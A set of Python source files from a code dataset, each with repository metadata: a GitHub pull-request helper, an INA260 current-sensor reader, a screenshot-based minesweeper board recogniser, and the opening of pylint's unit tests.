headers = {
'Authorization': 'Bearer ' + self.token
}
response = requests.post(url, headers=headers, json=payload)
if response.status_code == 201:
return True
return False
def workflow(token, user, repo, title, head, base, reviewers):
pr = PR(token, user, repo)
pr_number = pr.raise_pr(title, head, base)
if pr_number == -1:
print("PULL_REQUEST ERROR unable to raise a PR")
review = pr.request_review(pr_number, reviewers)
if not review:
print("REVIEW_REQUEST ERROR unable to add reviewer to the PR")
if __name__ == '__main__':
if len(sys.argv) < 8:
print("Usage: python3 main.py <token> <user> <repo> <pull request title> <pull request head> <pull request base> <pull request reviewers>")
sys.exit(1)
workflow(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7].split(","))
| ajayk007/UI_release | raise_pr.py | raise_pr.py | py | 2,156 | python | en | code | 0 | github-code | 36 |
3204985173 | '''
TI INA260 Current Logging (I2C-register-based)
Datasheet: http://www.ti.com/lit/ds/symlink/ina260.pdf?ts=1590430404379
I2C address: 0x44
'''
import smbus
import time
class INA260:
# INA260 registers address
__REG_CONFIG = 0x00
__REG_CURRENT = 0x01
__REG_BUS_VOLTAGE_ADDR = 0x02
# Divider value
BUS_VOLTAGE_LSB = 1.25
CURRENT_LSB = 1.25
def __init__(self, i2c_addr, verbose=False):
'''
Initialization
'''
# Open I2C bus
try:
self.bus = smbus.SMBus(1)
except:
print('Error occured when opening bus')
self.INA260_I2C_ADDR = i2c_addr
self.verbose = verbose
def twos_compliment_to_int(self, val, len):
'''
Convert two's complement to integer with len bit
'''
if(val & (1 << len - 1)):
val = val - (1 << len)
return val
def reset(self):
'''
Reset value stored in register
'''
self.bus.write_i2c_block_data(self.INA260_I2C_ADDR, self.__REG_CONFIG, [0x80, 0x00])
def get_bus_voltage(self):
'''
Get bus voltage
'''
# Read 2 blocks of data
raw_vbus = self.bus.read_i2c_block_data(self.INA260_I2C_ADDR, self.__REG_BUS_VOLTAGE_ADDR, 2)
data_vbus = raw_vbus[0] * 256 + raw_vbus[1]
val_vbus = float(data_vbus) / 1000.0 * self.BUS_VOLTAGE_LSB
return val_vbus
def get_current(self):
raw_current = self.bus.read_i2c_block_data(self.INA260_I2C_ADDR, self.__REG_CURRENT, 2)
data_current = raw_current[0] * 256 + raw_current[1]
sign_current = data_current >> 15
# Signed (negative)
if sign_current:
val_current = float(self.twos_compliment_to_int(data_current, 16)) / 1000.0 * self.CURRENT_LSB
else:
val_current = float(data_current) / 1000.0 * self.CURRENT_LSB
return val_current * 1000
if __name__ == '__main__':
ina = INA260(i2c_addr=0x40, verbose=True)
while True:
print("Voltage: {:.4f} | Current: {:.4f}".format(ina.get_bus_voltage(), ina.get_current()))
time.sleep(0.5)
| rasisbuldan/ta-shop | data-acq/ina260/ina260.py | ina260.py | py | 2,210 | python | en | code | 2 | github-code | 36 |
16140910097 | """
Recognizes the mine board from screenshot.
"""
import os
import sys
import numpy as np
from scipy.spatial.distance import cdist
import cv2
from PIL import Image
from solverutils import CID
import pyautogui as pg
IMGDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'imgs')
# related to board cells localization
DOTS_TOL = 200 # the max allowed template matching difference
# related to open cell recognition
OPEN_THR = 153 # the brightness between digit (122) and background (188)
# related to remaining mines digit recognition
MR_LOOKUPTABLE = np.array([
[1, 0, 1, 1, 0, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 0, 1, 1],
[1, 0, 1, 1, 0, 1, 1, 0, 1, 1],
[1, 0, 0, 0, 1, 1, 1, 0, 1, 1],
[1, 0, 1, 0, 0, 0, 1, 0, 1, 0],
[1, 1, 1, 1, 1, 0, 0, 1, 1, 1],
[1, 1, 0, 1, 1, 1, 1, 1, 1, 1],
]) * 2 - 1
# related to remaining mines digit recognition
MR_UNITS = np.array([100, 10, 1])
def normalize(image):
"""
Normalize a uint8 image to [-1.0, 1.0].
"""
return (image.astype(np.float64) - 128) / 128
def tobw(img, threshold):
return ((img.astype(np.int64) >= threshold) * 255).astype(np.uint8)
def loadimg(filename: str):
"""
Load image as grayscale from ``IMGDIR``.
:param filename: the image filename
:return: a uint8 image
"""
filename = os.path.join(IMGDIR, filename)
img = np.asarray(Image.open(filename).convert('L'))
return img
def get_rect_midpoint(top_left, shape):
return np.array([
top_left[0] + shape[1] // 2,
top_left[1] + shape[0] // 2,
])
def make_screenshot(sct, monitor=None, region=None, esc_before_grab=False):
"""
Make uint8 grayscale screenshot of specified region on specified monitor.
:param sct: the ``mss.mss()`` instance
:param monitor: ``None`` for the first monitor, positive integer for the
monitor of that id, and dict for that monitor
:type monitor: Union[None, int, dict]
:param region: ``None`` for the entire region, and dict for the specified
region plus the offset imposed by the specified monitor
:param esc_before_grab: press Esc key before grabbing to temporarily hide
the mouse cursor
:return: numpy array of the grayscale screenshot
"""
if isinstance(monitor, int):
monitor = sct.monitors[monitor]
elif not monitor:
monitor = sct.monitors[1]
if esc_before_grab:
pg.press('esc')
if region:
adjusted_region = region.copy()
adjusted_region['top'] += monitor['top']
adjusted_region['left'] += monitor['left']
img = sct.grab(adjusted_region)
else:
img = sct.grab(monitor)
img = Image.frombytes('RGB', img.size, img.bgra, 'raw', 'BGRX')
return np.asarray(img.convert('L'))
class BoardNotFoundError(Exception):
"""
Raised when the board cells cannot be segmented out correctly.
"""
pass
class BoardDetector:
"""
Attributes (note: the x-y coordinate complies to image convention):
- ``upper``: the smallest y coordinate of the board (readonly)
- ``lower``: the largest y coordinate of the board (readonly)
- ``left``: the smallest x coordinate of the board (readonly)
- ``right``: the largest x coordinate of the baord (readonly)
- ``height``: the number of cells along each column (readonly)
- ``width``: the number of cells along each row (readonly)
- ``hkls``: horizontal key lines of the cell board
- ``vkls``: vertical key lines of the cell board
Below attributes may be ``None`` if ``enable_mr_detect=False`` when
``new``:
- ``upper_mr``: the smallest y coordinate of the remaining mines label
- ``lower_mr``: the largest y coordinate of the remaining mines label
- ``left_mr``: the smallest x coordinate of the remaining mines label
- ``right_mr``: the largest x coordinate of the remaining mines label
"""
def __init__(self, mon_id, dpr, hkls, vkls, upper_mr, lower_mr, left_mr,
right_mr):
"""
This method shouldn't be called explicitly.
"""
# the monitor id
self.mon_id = mon_id
# the device pixel ratio (x, y)
self.dpr = dpr
# the cell board key lines
self.hkls = hkls
self.vkls = vkls
# the remaining mines label location
self.upper_mr = upper_mr
self.lower_mr = lower_mr
self.left_mr = left_mr
self.right_mr = right_mr
# precomputed board region and remaining mines region
self.board_region = {
'top': self.upper, # self.upper is a property
'left': self.left, # same
'width': self.right - self.left, # same
'height': self.lower - self.upper, # same
}
if self.upper_mr is not None:
self.mr_region = {
'top': self.upper_mr // self.dpr[1],
'left': self.left_mr // self.dpr[0],
'width': (self.right_mr - self.left_mr) // self.dpr[0],
'height': (self.lower_mr - self.upper_mr) // self.dpr[1],
}
else:
self.mr_region = None
# precomputed offset hkls and vkls, i.e. the key lines with respect
# to the upper left corner of the board region
self.offset_hkls = self.hkls - self.hkls[0]
self.offset_vkls = self.vkls - self.vkls[0]
# preload various cells
loaded_imgs = [
tobw(loadimg('open{}.gif'.format(i)), OPEN_THR)
for i in range(0, 9)
]
loaded_imgs.extend(
map(loadimg, [
'bombflagged.gif', 'bombdeath.gif', 'bombmisflagged.gif',
'bombrevealed.gif', 'blank.gif'
]))
self._face_templates = np.stack(loaded_imgs).astype(np.float64)
self._face_templates = self._face_templates / 255 * 2 - 1
self._face_templates = self._face_templates.reshape(
self._face_templates.shape[0], -1)
self._face_templates_cids = [
0,
1,
2,
3,
4,
5,
6,
7,
8,
CID['f'],
CID['m'],
CID['m'],
CID['m'],
CID['q'],
]
@property
def upper(self):
return self.hkls[0] // self.dpr[1]
@property
def lower(self):
return self.hkls[-1] // self.dpr[1]
@property
def left(self):
return self.vkls[0] // self.dpr[0]
@property
def right(self):
return self.vkls[-1] // self.dpr[0]
@property
def height(self):
"""Board height, not pixel height"""
return self.hkls.size - 1
@property
def width(self):
"""Board width, not pixel width"""
return self.vkls.size - 1
def __str__(self):
return ('{0.__class__.__name__}('
'mon_id={0.mon_id}, '
'dpr={0.dpr}, '
'hkls={0.hkls}, '
'vkls={0.vkls}, '
'upper_mr={0.upper_mr}, '
'lower_mr={0.lower_mr}, '
'left_mr={0.left_mr}, '
'right_mr={0.right_mr})'.format(self))
def __repr__(self):
return ('{0.__class__.__name__}('
'mon_id={0.mon_id} '
'dpr={0.dpr}, '
'hkls={0.hkls!r}, '
'vkls={0.vkls!r}, '
'upper_mr={0.upper_mr!r}, '
'lower_mr={0.lower_mr!r}, '
'left_mr={0.left_mr!r}, '
'right_mr={0.right_mr!r})'.format(self))
@classmethod
def new(cls, mon_screenshots, enable_mr_detect=False):
"""
Try every pair of (monitor id, monitor resolution, screenshot) until
one returns an instance of ``BoardDetector``.
:param mon_screenshots: list of tuples of (monitor id, monitor
resolution (width, height), the uint8 grayscale screenshot
possibly containing an empty board)
:param enable_mr_detect: if ``True``, enable mines remaining detection
:return: a ``BoardDetector`` object
:raise BoardNotFoundError: if until the last monitor ``BoardDetector``
is not instantiated successfully
"""
total_num = len(mon_screenshots)
for i, (mon_id, mon_res, screenshot) in enumerate(mon_screenshots, 1):
try:
return cls._new(mon_id, mon_res, screenshot, enable_mr_detect)
except BoardNotFoundError:
if i == total_num:
raise
@classmethod
def _new(cls, mon_id: int, mon_res, screenshot: np.ndarray,
enable_mr_detect):
"""
Returns a new instance of ``BoardDetector`` from ``screenshot``.
:param mon_id: the monitor id
:param mon_res: the monitor resolution (width, height)
:param screenshot: the uint8 grayscale screenshot containing an empty
board
:param enable_mr_detect: if ``True``, enable mines remaining detection
:return: a ``BoardDetector`` object
:raise BoardNotFoundError:
"""
# COMPUTE DEVICE PIXEL RATIO
dpr_x = screenshot.shape[1] // mon_res[0]
dpr_y = screenshot.shape[0] // mon_res[1]
# LOCALIZE CELL BOARD
crosstmpl = loadimg('b_crs.png')
mmr = cv2.matchTemplate(screenshot, crosstmpl,
cv2.TM_SQDIFF) <= DOTS_TOL
dots = np.stack(np.nonzero(mmr), axis=1)
if dots.size == 0:
raise BoardNotFoundError('no board cross is found')
u0, cnt0 = np.unique(dots[:, 0], return_counts=True)
u1, cnt1 = np.unique(dots[:, 1], return_counts=True)
# remove outliers
cnt0_e, cnt0_c = np.unique(cnt0, return_counts=True)
cnt0_mode = cnt0_e[np.argmax(cnt0_c)]
cnt1_e, cnt1_c = np.unique(cnt1, return_counts=True)
cnt1_mode = cnt1_e[np.argmax(cnt1_c)]
to_delete = [
np.where(dots[:, 0] == x)[0] for x in u0[cnt0 < cnt0_mode]
] + [np.where(dots[:, 1] == x)[0] for x in u1[cnt1 < cnt1_mode]]
if to_delete:
dots = np.delete(
dots, np.unique(np.concatenate(to_delete)), axis=0)
ch_ = np.unique(np.diff(np.unique(dots[:, 0]))) # cell intervals y
cw_ = np.unique(np.diff(np.unique(dots[:, 1]))) # cell intervals x
# allow one unique dot interval or two successive dot intervals due
# to rounding error
if not ((ch_.size == 1 or
(ch_.size == 2 and abs(ch_[0] - ch_[1]) == 1)) and
(cw_.size == 1 or
(cw_.size == 2 and abs(cw_[0] - cw_[1]) == 1))):
raise BoardNotFoundError('board crosses are not localized '
'correctly')
# the horizontal (arranged along matrix axis=0) key lines
hkls = np.unique(dots[:, 0])
hkls = np.concatenate((
[hkls[0] - (hkls[1] - hkls[0])],
hkls,
[hkls[-1] + (hkls[-1] - hkls[-2])],
)) + 1
# the vertical (arranged along matrix axis=1) key lines
vkls = np.unique(dots[:, 1])
vkls = np.concatenate((
[vkls[0] - (vkls[1] - vkls[0])],
vkls,
[vkls[-1] + (vkls[-1] - vkls[-2])],
)) + 1
if not enable_mr_detect:
return cls(mon_id, (dpr_x, dpr_y), hkls, vkls, None, None, None,
None)
left = vkls[0]
right = vkls[-1]
# LOCALIZE MINE REMAINING LABEL
mrlltmpl = loadimg('mr_ll.png')
mrlrtmpl = loadimg('mr_lr.png')
mrultmpl = loadimg('mr_ul.png')
MR_TOL = 50
mrllloc = np.stack(
np.nonzero(
cv2.matchTemplate(screenshot, mrlltmpl, cv2.TM_SQDIFF) <=
MR_TOL),
axis=1)
mrlrloc = np.stack(
np.nonzero(
cv2.matchTemplate(screenshot, mrlrtmpl, cv2.TM_SQDIFF) <=
MR_TOL),
axis=1)
mrulloc = np.stack(
np.nonzero(
cv2.matchTemplate(screenshot, mrultmpl, cv2.TM_SQDIFF) <=
MR_TOL),
axis=1)
mrlrloc = np.delete(
mrlrloc, np.where(mrlrloc[:, 1] >= np.mean((left, right))), axis=0)
mrulloc = np.delete(
mrulloc, np.where(mrulloc[:, 1] >= np.mean((left, right))), axis=0)
if mrllloc.size > 0 and abs(mrllloc[0, 1] - left + 1) <= 1:
mrllloc[0, 1] = left - 1
if mrulloc.size > 0 and abs(mrulloc[0, 1] - left + 1) <= 1:
mrulloc[0, 1] = left - 1
if (any(x.shape[0] != 1 for x in (mrllloc, mrlrloc, mrulloc))
or mrllloc[0, 1] != left - 1 or mrllloc[0, 0] != mrlrloc[0, 0]
or mrulloc[0, 1] != left - 1):
raise BoardNotFoundError('remaining mines label is not localized '
'correctly')
lower_mr, left_mr = mrllloc[0] + 1
upper_mr = mrulloc[0, 0] + 1
right_mr = mrlrloc[0, 1] + 1
return cls(mon_id, (dpr_x, dpr_y), hkls, vkls, upper_mr, lower_mr,
left_mr, right_mr)
def recognize_board_and_mr(self, sct):
boardimg, mrimg = self.localize_board_and_mr(sct)
cellimgs = self.get_cells_from_board(boardimg)
cells = self.recognize_cells(cellimgs)
if self.upper_mr is None:
mr = None
else:
mr = self.recognize_mr_digits(mrimg)
return cells, mr, boardimg
@staticmethod
def recognize_mr_digits(roi_gray):
region = roi_gray > 50
vert = np.linspace(0, region.shape[1], 7, dtype=np.int64)
hori = np.linspace(0, region.shape[0], 5, dtype=np.int64)
vresults = np.split(region[:, vert[1::2]], hori[1::2], axis=0)
hresults = np.split(region[hori[1::2], :], vert[1:-1], axis=1)
vresults = np.stack([np.sum(x, axis=0) > 0 for x in vresults], axis=1)
hresults = np.stack([np.sum(x, axis=1) > 0 for x in hresults])
hresults = hresults.reshape((3, 4))
results = np.concatenate((vresults, hresults), axis=1).astype(np.int64)
digits = np.argmax(np.matmul(results * 2 - 1, MR_LOOKUPTABLE), axis=1)
return np.dot(digits, MR_UNITS)
def localize_board_and_mr(self, sct):
"""
Returns ``(cell_board_image, mine_remaining_image)`` if
``enable_mr_detect`` was ``True`` when calling ``new`` to construct
this ``BoardDetector``; otherwise, returns
``(cell_board_image, None)``.
"""
boardimg = make_screenshot(sct, self.mon_id, self.board_region,
esc_before_grab=True)
if self.upper_mr is None:
return boardimg, None
mrimg = make_screenshot(sct, self.mon_id, self.mr_region)
return boardimg, mrimg
def get_cells_from_board(self, boardimg):
cells = []
for i in range(self.offset_hkls.size - 1):
for j in range(self.offset_vkls.size - 1):
# yapf: disable
c = boardimg[self.offset_hkls[i]:self.offset_hkls[i + 1],
self.offset_vkls[j]:self.offset_vkls[j + 1]]
# yapf: enable
cells.append(np.copy(c))
cells = np.stack(cells)
return cells
def recognize_cells(self, cells):
cells = np.stack(
[tobw(cv2.resize(x, (16, 16)), OPEN_THR) for x in cells])
cells = cells.astype(np.float64) / 255 * 2 - 1
cells = cells.reshape((cells.shape[0], -1))
D = cdist(self._face_templates, cells)
predictions = np.argmin(D, axis=0)
predictions = [self._face_templates_cids[x] for x in predictions]
predictions = np.array(predictions).reshape((self.height, self.width))
return predictions
def boardloc_as_pixelloc(self, blocs):
"""
Convert a batch of board locations to a batch of pixel locations. Note
that in the board coordinate x axis is from the upper left corner to
the lower left corner and the y axis is from the upper left corner to
the upper right corner; whereas in the pixel coordinate x axis is from
the upper left corner to the upper right corner, etc.
:param blocs: of form (array([...], dtype=int), array([...], dtype=int)
where the first array is the board x coordinates, and the
second array the board y coordinates
:return: pixel coordinates of the same form as ``blocs``
"""
bx, by = blocs
py = ((self.hkls[bx] + self.hkls[bx + 1]) / 2).astype(int)
px = ((self.vkls[by] + self.vkls[by + 1]) / 2).astype(int)
return px, py
@staticmethod
def _cc_dist(query, templates):
return min(
abs(x.astype(np.int64) - query.astype(np.int64))
for x in templates)
# pylint: disable=too-few-public-methods
class StageIdentifier:
def identify_stage(self, scr, board):
"""
:param scr: should be an array of shape (H, W), of dtype uint8
:param board: the recognized board
"""
min_white_ratio = 1 / 3 # minimum required ratio of white pixels
sample_size = 32 # size of center crop
assert scr.shape[0] > sample_size and scr.shape[1] > sample_size
splower = (scr.shape[0] - sample_size) // 2
spleft = (scr.shape[1] - sample_size) // 2
spl = scr[splower:splower + sample_size, spleft:spleft + sample_size]
# if the winning message appears, there should be many white pixels
# within the crop region
if np.sum(spl > 250) / spl.size > min_white_ratio:
return 'win'
if np.any(board == CID['m']):
return 'lost'
return 'ongoing'
def _main():
parser = argparse.ArgumentParser(
description='Recognize board from screenshot.')
parser.add_argument(
'-R',
dest='empty_board',
type=os.path.normpath,
help='recognize from screenshot given EMPTY_BOARD in '
'scene if specified; otherwise, localize board '
'and mine remaining label from screenshot')
parser.add_argument(
'-D',
dest='empty_board_monitor',
type=int,
default=1,
help='the monitor id of the empty_board')
parser.add_argument(
'-b',
type=os.path.normpath,
dest='board_tofile',
metavar='FILE',
help='if specified, the board image will be saved to '
'FILE')
parser.add_argument(
'-m',
type=os.path.normpath,
dest='mr_tofile',
metavar='FILE',
help='if specified, the mine remaining image will be '
'saved to FILE')
parser.add_argument(
'-C',
type=os.path.normpath,
dest='cellnpy_tofile',
metavar='FILE',
help='if specified, the cell images are zipped in an npy FILE')
args = parser.parse_args()
with mss.mss() as sct:
def get_mon_resolution(_mon_id):
_mon = sct.monitors[_mon_id]
return _mon['width'], _mon['height']
if not args.empty_board:
empty_board = [(i, get_mon_resolution(i), make_screenshot(sct, i))
for i in range(1, len(sct.monitors))]
else:
empty_board = [
(
args.empty_board_monitor,
get_mon_resolution(args.empty_board_monitor),
np.asarray(Image.open(args.empty_board).convert('L')),
),
]
bd = BoardDetector.new(empty_board, True)
boardimg, mrimg = bd.localize_board_and_mr(sct)
if args.board_tofile:
Image.fromarray(boardimg).save(args.board_tofile)
if args.mr_tofile:
Image.fromarray(mrimg).save(args.mr_tofile)
print('The board:')
board = bd.recognize_cells(bd.get_cells_from_board(boardimg))
np.savetxt(sys.stdout, board, fmt='%d', delimiter=',')
print('Mines remaining:')
print(bd.recognize_mr_digits(mrimg))
print('Winning state:')
print(StageIdentifier().identify_stage(boardimg, board))
if args.cellnpy_tofile:
np.save(args.cellnpy_tofile, bd.get_cells_from_board(boardimg))
print(bd)
if __name__ == '__main__':
import argparse
import mss
_main()
| kkew3/sat-minesweeper | vboard.py | vboard.py | py | 20,542 | python | en | code | 6 | github-code | 36 |
21609680031 | from contextlib import contextmanager
import sys
import os
import tempfile
from shutil import rmtree
from os import getcwd, chdir
from os.path import join, basename, dirname, isdir, abspath, sep
import unittest
import six
from six.moves import reload_module
from pylint import config, lint
from pylint.lint import PyLinter, Run, preprocess_options, \
ArgumentPreprocessingError
from pylint.utils import MSG_STATE_SCOPE_CONFIG, MSG_STATE_SCOPE_MODULE, MSG_STATE_CONFIDENCE, \
MessagesStore, PyLintASTWalker, MessageDefinition, FileState, \
build_message_def, tokenize_module, UnknownMessage
from pylint.testutils import TestReporter, catch_warnings
from pylint.reporters import text, html
from pylint import checkers
from pylint.checkers.utils import check_messages
from pylint import interfaces
if os.name == 'java':
if os._name == 'nt':
HOME = 'USERPROFILE'
else:
HOME = 'HOME'
else:
if sys.platform == 'win32':
HOME = 'USERPROFILE'
else:
HOME = 'HOME'
@contextmanager
def fake_home():
folder = tempfile.mkdtemp('fake-home')
old_home = os.environ.get(HOME)
try:
os.environ[HOME] = folder
yield
finally:
os.environ.pop('PYLINTRC', '')
if old_home is None:
del os.environ[HOME]
else:
os.environ[HOME] = old_home
rmtree(folder, ignore_errors=True)
def remove(file):
try:
os.remove(file)
except OSError:
pass
HERE = abspath(dirname(__file__))
INPUTDIR = join(HERE, 'input')
@contextmanager
def tempdir():
"""Create a temp directory and change the current location to it.
This is supposed to be used with a *with* statement.
"""
tmp = tempfile.mkdtemp()
# Get real path of tempfile, otherwise test fail on mac os x
current_dir = getcwd()
chdir(tmp)
abs_tmp = abspath('.')
try:
yield abs_tmp
finally:
chdir(current_dir)
rmtree(abs_tmp)
def create_files(paths, chroot='.'):
"""Creates directories and files found in <path>.
:param paths: list of relative paths to files or directories
:param chroot: the root directory in which paths will be created
>>> from os.path import isdir, isfile
>>> isdir('/tmp/a')
False
>>> create_files(['a/b/foo.py', 'a/b/c/', 'a/b/c/d/e.py'], '/tmp')
>>> isdir('/tmp/a')
True
>>> isdir('/tmp/a/b/c')
True
>>> isfile('/tmp/a/b/c/d/e.py')
True
>>> isfile('/tmp/a/b/foo.py')
True
"""
dirs, files = set(), set()
for path in paths:
path = join(chroot, path)
filename = basename(path)
# path is a directory path
if filename == '':
dirs.add(path)
# path is a filename path
else:
dirs.add(dirname(path))
files.add(path)
for dirpath in dirs:
if not isdir(dirpath):
os.makedirs(dirpath)
for filepath in files:
open(filepath, 'w').close()
class SysPathFixupTC(unittest.TestCase):
def setUp(self):
self.orig = list(sys.path)
self.fake = [1, 2, 3]
sys.path[:] = self.fake
def tearDown(self):
sys.path[:] = self.orig
def test_no_args(self):
with lint.fix_import_path([]):
self.assertEqual(sys.path, self.fake)
self.assertEqual(sys.path, self.fake)
def test_one_arg(self):
with tempdir() as chroot:
create_files(['a/b/__init__.py'])
expected = [join(chroot, 'a')] + self.fake
cases = (
['a/b/'],
['a/b'],
['a/b/__init__.py'],
['a/'],
['a'],
)
self.assertEqual(sys.path, self.fake)
for case in cases:
with lint.fix_import_path(case):
self.assertEqual(sys.path, expected)
self.assertEqual(sys.path, self.fake)
def test_two_similar_args(self):
with tempdir() as chroot:
create_files(['a/b/__init__.py', 'a/c/__init__.py'])
expected = [join(chroot, 'a')] + self.fake
cases = (
['a/b', 'a/c'],
['a/c/', 'a/b/'],
['a/b/__init__.py', 'a/c/__init__.py'],
['a', 'a/c/__init__.py'],
)
self.assertEqual(sys.path, self.fake)
for case in cases:
with lint.fix_import_path(case):
self.assertEqual(sys.path, expected)
self.assertEqual(sys.path, self.fake)
def test_more_args(self):
with tempdir() as chroot:
create_files(['a/b/c/__init__.py', 'a/d/__init__.py', 'a/e/f.py'])
expected = [
join(chroot, suffix)
for suffix in [sep.join(('a', 'b')), 'a', sep.join(('a', 'e'))]
] + self.fake
cases = (
['a/b/c/__init__.py', 'a/d/__init__.py', 'a/e/f.py'],
['a/b/c', 'a', 'a/e'],
['a/b/c', 'a', 'a/b/c', 'a/e', 'a'],
)
self.assertEqual(sys.path, self.fake)
for case in cases:
with lint.fix_import_path(case):
self.assertEqual(sys.path, expected)
self.assertEqual(sys.path, self.fake)
class PyLinterTC(unittest.TestCase):
def setUp(self):
self.linter = PyLinter()
self.linter.disable('I')
self.linter.config.persistent = 0
# register checkers
checkers.initialize(self.linter)
self.linter.set_reporter(TestReporter())
def init_linter(self):
linter = self.linter
linter.open()
linter.set_current_module('toto')
linter.file_state = FileState('toto')
return linter
def test_pylint_visit_method_taken_in_account(self):
class CustomChecker(checkers.BaseChecker):
__implements__ = interfaces.IAstroidChecker
name = 'custom'
msgs = {'W9999': ('', 'custom', '')}
@check_messages('custom')
def visit_class(self, _):
pass
self.linter.register_checker(CustomChecker(self.linter))
self.linter.open()
out = six.moves.StringIO()
self.linter.set_reporter(text.TextReporter(out))
self.linter.check('abc')
def test_enable_message(self):
linter = self.init_linter()
self.assertTrue(linter.is_message_enabled('W0101'))
self.assertTrue(linter.is_message_enabled('W0102'))
linter.disable('W0101', scope='package')
linter.disable('W0102', scope='module', line=1)
self.assertFalse(linter.is_message_enabled('W0101'))
self.assertFalse(linter.is_message_enabled('W0102', 1))
linter.set_current_module('tutu')
self.assertFalse(linter.is_message_enabled('W0101'))
self.assertTrue(linter.is_message_enabled('W0102'))
linter.enable('W0101', scope='package')
linter.enable('W0102', scope='module', line=1)
self.assertTrue(linter.is_message_enabled('W0101'))
self.assertTrue(linter.is_message_enabled('W0102', 1))
def test_enable_message_category(self):
linter = self.init_linter()
self.assertTrue(linter.is_message_enabled('W0101'))
self.assertTrue(linter.is_message_enabled('C0202'))
linter.disable('W', scope='package')
linter.disable('C', scope='module', line=1)
self.assertFalse(linter.is_message_enabled('W0101'))
self.assertTrue(linter.is_message_enabled('C0202'))
self.assertFalse(linter.is_message_enabled('C0202', line=1))
linter.set_current_module('tutu')
self.assertFalse(linter.is_message_enabled('W0101'))
self.assertTrue(linter.is_message_enabled('C0202'))
linter.enable('W', scope='package')
linter.enable('C', scope='module', line=1)
self.assertTrue(linter.is_message_enabled('W0101'))
self.assertTrue(linter.is_message_enabled('C0202'))
self.assertTrue(linter.is_message_enabled('C0202', line=1))
def test_message_state_scope(self):
class FakeConfig(object):
confidence = ['HIGH']
linter = self.init_linter()
linter.disable('C0202')
self.assertEqual(MSG_STATE_SCOPE_CONFIG,
linter.get_message_state_scope('C0202'))
linter.disable('W0101', scope='module', line=3)
self.assertEqual(MSG_STATE_SCOPE_CONFIG,
linter.get_message_state_scope('C0202'))
self.assertEqual(MSG_STATE_SCOPE_MODULE,
linter.get_message_state_scope('W0101', 3))
linter.enable('W0102', scope='module', line=3)
self.assertEqual(MSG_STATE_SCOPE_MODULE,
linter.get_message_state_scope('W0102', 3))
linter.config = FakeConfig()
self.assertEqual(
MSG_STATE_CONFIDENCE,
linter.get_message_state_scope('this-is-bad',
confidence=interfaces.INFERENCE))
def test_enable_message_block(self):
linter = self.init_linter()
linter.open()
filepath = join(INPUTDIR, 'func_block_disable_msg.py')
linter.set_current_module('func_block_disable_msg')
astroid = linter.get_ast(filepath, 'func_block_disable_msg')
linter.process_tokens(tokenize_module(astroid))
fs = linter.file_state
fs.collect_block_lines(linter.msgs_store, astroid)
# global (module level)
self.assertTrue(linter.is_message_enabled('W0613'))
self.assertTrue(linter.is_message_enabled('E1101'))
# meth1
self.assertTrue(linter.is_message_enabled('W0613', 13))
# meth2
self.assertFalse(linter.is_message_enabled('W0613', 18))
# meth3
self.assertFalse(linter.is_message_enabled('E1101', 24))
self.assertTrue(linter.is_message_enabled('E1101', 26))
# meth4
self.assertFalse(linter.is_message_enabled('E1101', 32))
self.assertTrue(linter.is_message_enabled('E1101', 36))
# meth5
self.assertFalse(linter.is_message_enabled('E1101', 42))
self.assertFalse(linter.is_message_enabled('E1101', 43))
self.assertTrue(linter.is_message_enabled('E1101', 46))
self.assertFalse(linter.is_message_enabled('E1101', 49))
self.assertFalse(linter.is_message_enabled('E1101', 51))
# meth6
self.assertFalse(linter.is_message_enabled('E1101', 57))
self.assertTrue(linter.is_message_enabled('E1101', 61))
self.assertFalse(linter.is_message_enabled('E1101', 64))
self.assertFalse(linter.is_message_enabled('E1101', 66))
self.assertTrue(linter.is_message_enabled('E0602', 57))
self.assertTrue(linter.is_message_enabled('E0602', 61))
self.assertFalse(linter.is_message_enabled('E0602', 62))
self.assertTrue(linter.is_message_enabled('E0602', 64))
self.assertTrue(linter.is_message_enabled('E0602', 66))
# meth7
self.assertFalse(linter.is_message_enabled('E1101', 70))
self.assertTrue(linter.is_message_enabled('E1101', 72))
self.assertTrue(linter.is_message_enabled('E1101', 75))
self.assertTrue(linter.is_message_enabled('E1101', 77))
fs = linter.file_state
self.assertEqual(17, fs._suppression_mapping['W0613', 18])
self.assertEqual(30, fs._suppression_mapping['E1101', 33])
self.assertTrue(('E1101', 46) not in fs._suppression_mapping)
self.assertEqual(1, fs._suppression_mapping['C0302', 18])
self.assertEqual(1, fs._suppression_mapping['C0302', 50])
# This is tricky. While the disable in line 106 is disabling
# both 108 and 110, this is usually not what the user wanted.
# Therefore, we report the closest previous disable comment.
self.assertEqual(106, fs._suppression_mapping['E1101', 108])
self.assertEqual(109, fs._suppression_mapping['E1101', 110])
def test_enable_by_symbol(self):
"""messages can be controlled by symbolic names.
The state is consistent across symbols and numbers.
"""
linter = self.init_linter()
self.assertTrue(linter.is_message_enabled('W0101'))
self.assertTrue(linter.is_message_enabled('unreachable'))
self.assertTrue(linter.is_message_enabled('W0102'))
self.assertTrue(linter.is_message_enabled('dangerous-default-value'))
linter.disable('unreachable', scope='package')
linter.disable('dangerous-default-value', scope='module', line=1)
self.assertFalse(linter.is_message_enabled('W0101'))
self.assertFalse(linter.is_message_enabled('unreachable'))
self.assertFalse(linter.is_message_enabled('W0102', 1))
self.assertFalse(linter.is_message_enabled('dangerous-default-value', 1))
linter.set_current_module('tutu')
self.assertFalse(linter.is_message_enabled('W0101'))
self.assertFalse(linter.is_message_enabled('unreachable'))
self.assertTrue(linter.is_message_enabled('W0102'))
self.assertTrue(linter.is_message_enabled('dangerous-default-value'))
linter.enable('unreachable', scope='package')
linter.enable('dangerous-default-value', scope='module', line=1)
self.assertTrue(linter.is_message_enabled('W0101'))
self.assertTrue(linter.is_message_enabled('unreachable'))
self.assertTrue(linter.is_message_enabled('W0102', 1))
self.assertTrue(linter.is_message_enabled('dangerous-default-value', 1))
def test_lint_ext_module_with_file_output(self):
self.linter.set_reporter(text.TextReporter())
if sys.version_info < (3, 0):
strio = 'StringIO'
else:
strio = 'io'
self.linter.config.files_output = True
pylint_strio = 'pylint_%s.txt' % strio
files = [pylint_strio, 'pylint_global.txt']
for file in files:
self.addCleanup(remove, file)
self.linter.check(strio)
self.linter.generate_reports()
for f in files:
self.assertTrue(os.path.exists(f))
def test_enable_report(self):
self.assertEqual(self.linter.report_is_enabled('RP0001'), True)
self.linter.disable('RP0001')
self.assertEqual(self.linter.report_is_enabled('RP0001'), False)
self.linter.enable('RP0001')
